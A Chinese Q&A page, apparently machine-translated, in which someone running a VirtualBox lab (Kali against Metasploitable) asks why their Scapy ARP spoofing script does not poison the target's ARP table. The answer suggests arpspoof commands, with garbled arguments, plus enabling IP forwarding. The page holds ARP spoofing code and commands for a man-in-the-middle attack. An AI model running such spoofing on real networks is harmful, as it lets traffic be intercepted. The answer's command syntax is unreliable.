微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

我正在尝试用Scapy进行arp欺骗攻击,但是我的目标arp表注册了我的ip地址而不是被欺骗的IP地址

如何解决我正在尝试用Scapy进行arp欺骗攻击,但是我的目标arp表注册了我的ip地址而不是被欺骗的IP地址

我正在尝试用船尾进行仿冒攻击。 我在Linux Min OS中使用virtualBox,我的攻击机是KaliLinux,目标是Metasploitable。 这是我的船长脚本:

targetIP="192.168.56.103"
gatewayIP="192.168.56.1"
myIP="192.168.56.101"
targetMAC="08:00:27:57:58:54"
myMAC="08:00:27:7d:94:1e"

a = ARP()
a.psrc = gatewayIP
a.pdst = targetIP
a.hwdst = targetMAC
a.hwsrc = myMAC
a.op = 2

send(a)

我发送了a后,我希望目标的arp表会

gatewayIP => myMAC

但是我得到了

myIp => myMAC

我在做什么错了?

解决方法

如果您想在Kalilinux中查看arp表;您可以在提示时编写arp --a。而且,如果您想攻击,也可以使用; arpspoof -i eth0 --targetIP NetworkDeviceIP arpspoof -i eth0 --NetworkDeviceIP targetIP

但不要忘记使IP向前发展。

我希望它会起作用。

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。